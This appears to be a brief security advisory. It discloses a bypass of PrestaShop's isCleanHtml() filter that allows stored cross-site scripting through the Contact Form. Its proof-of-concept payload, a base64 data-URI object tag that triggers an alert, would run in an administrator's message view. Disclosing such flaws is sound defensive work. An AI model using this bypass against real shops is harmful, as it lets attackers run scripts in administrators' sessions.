When installing and analyzing PrestaShop on a secure environment I discovered that it's possible to bypass isCleanHtml() function, used in many places, specially in Contact Form. A user could use this vulnerability, a Persistent Cross-site Scripting, to execute malicious payloads on admins message box.

Proof of concept:
In the message field a user could write:
<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgid2Vic2VndXJhLm5ldC14c3MiKTwvc2NyaXB0Pg=='></object>
<a href="#" target="_blank"><img src="http://www.prestashop.com/images/logo.png"; width="800px"height="600px" border="0" /></a>